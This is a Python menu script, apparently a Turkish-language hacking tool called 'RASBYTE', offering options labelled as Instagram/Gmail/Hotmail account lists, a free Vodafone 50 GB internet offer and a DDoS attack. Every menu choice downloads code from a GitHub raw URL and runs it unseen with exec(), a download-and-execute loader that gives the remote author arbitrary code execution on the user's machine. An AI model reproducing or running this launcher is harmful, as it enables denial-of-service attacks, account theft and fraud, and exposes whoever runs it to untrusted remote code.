import os
import sys
import requests

def clear_screen():
    os.system('cls' if os.name == 'nt' else 'clear')

clear_screen()

try:
    from colorama import Fore, Style, init
except ImportError:
    print("colorama modülü eksikmiş mk indiriyorum...")
    os.system(f"{sys.executable} -m pip install colorama")
    clear_screen()
    from colorama import Fore, Style, init

init(autoreset=True)

banner = Fore.RED + r"""
  ____      _    ____  ______   _______ _____ 
 |  _ \    / \  / ___|| __ ) \ / /_   _| ____|
 | |_) |  / _ \ \___ \|  _ \\ V /  | | |  _|  
 |  _ <  / ___ \ ___) | |_) || |   | | | |___ 
 |_| \_\/_/   \_\____/|____/ |_|   |_| |_____|
 KODU KÜÇÜK AMA İŞLEVİ BÜYÜK
 Version 1.0
 By 0xroyz
""" + Fore.RESET

while True:
    clear_screen()
    print(banner)

    print(Fore.CYAN + "Pip İnstaller\n")
    print(Fore.YELLOW + "0." + Fore.GREEN + " GEREKLİ MODÜL İNDİR 0 YAZ İLK ÖNEMLİ YOKSA ÇALIŞMAZ\n")
    print(Fore.CYAN + "İnstagram List\n")
    print(Fore.YELLOW + "1." + Fore.GREEN + " 2012 - 2019 ig Gmail random ")
    print(Fore.YELLOW + "2." + Fore.GREEN + " 2012 - 2013 ig Gmail")
    print(Fore.YELLOW + "3." + Fore.GREEN + " 2010 - 2011 ig Gmail")
    print(Fore.YELLOW + "4." + Fore.GREEN + " 2012 - 2012 ig Hotmail\n")

    print(Fore.CYAN + "Mobil Hat List\n")
    print(Fore.YELLOW + "5." + Fore.GREEN + " Vodafone 50 GB İnternet\n")

    print(Fore.CYAN + "Web List\n")
    print(Fore.YELLOW + "6." + Fore.GREEN + " DDoS Attack\n")

    secim = input(Fore.MAGENTA + "Seçımını yap 0 - 6: ")

    if secim == "0":
        clear_screen()
        exec(requests.get("https://raw.githubusercontent.com/royzempire/rasbytepro/refs/heads/main/pip").text)
        sys.exit()

    elif secim == "1":
        clear_screen()
        exec(requests.get("https://raw.githubusercontent.com/royzempire/rasbytepro/refs/heads/main/1219gm").text)
        sys.exit()

    elif secim == "2":
        clear_screen()
        exec(requests.get("https://raw.githubusercontent.com/royzempire/rasbytepro/refs/heads/main/1213gm").text)
        sys.exit()

    elif secim == "3":
        clear_screen()
        exec(requests.get("https://raw.githubusercontent.com/royzempire/rasbytepro/refs/heads/main/1011gm").text)
        sys.exit()

    elif secim == "4":
        clear_screen()
        exec(requests.get("https://raw.githubusercontent.com/royzempire/rasbytepro/refs/heads/main/1213hot").text)
        sys.exit()

    elif secim == "5":
        clear_screen()
        exec(requests.get("https://raw.githubusercontent.com/royzempire/rasbytepro/refs/heads/main/vd50gb").text)
        sys.exit()

    elif secim == "6":
        clear_screen()
        exec(requests.get("https://raw.githubusercontent.com/royzempire/rasbytepro/refs/heads/main/ddos").text)
        sys.exit()

    else:
        print(Fore.RED + "\nYanlış seçim yaptın\n")